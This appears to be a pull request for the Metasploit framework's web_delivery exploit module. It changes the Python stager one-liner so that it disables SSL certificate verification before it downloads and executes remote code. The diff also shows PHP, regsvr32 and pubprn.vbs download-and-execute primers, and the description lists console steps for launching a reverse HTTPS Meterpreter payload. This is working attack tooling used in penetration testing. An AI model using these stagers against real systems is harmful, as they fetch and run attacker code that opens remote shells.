### PR TITLE
Ignore SSL cert in python web_delivery

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def primer
     php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
-    python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
+    python = %Q(python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}', context=ssl._create_unverified_context());exec(r.read());")
     regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
     pubprn = %Q(C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct)
 


### PR DESCRIPTION
ATM the python web_delivery stager is not ignoring the SSL certificate. historically, `urllib2` was not verifying it but this changed over time.

- [x] `use exploit/multi/script/web_delivery`
- [x] `set payload python/meterpreter/reverse_https`
- [x] `set srvport 80`
- [x] `set SSL true`
- [x] `set lhost eth1`
- [x] `set lport 443`
- [x] `exploit -j`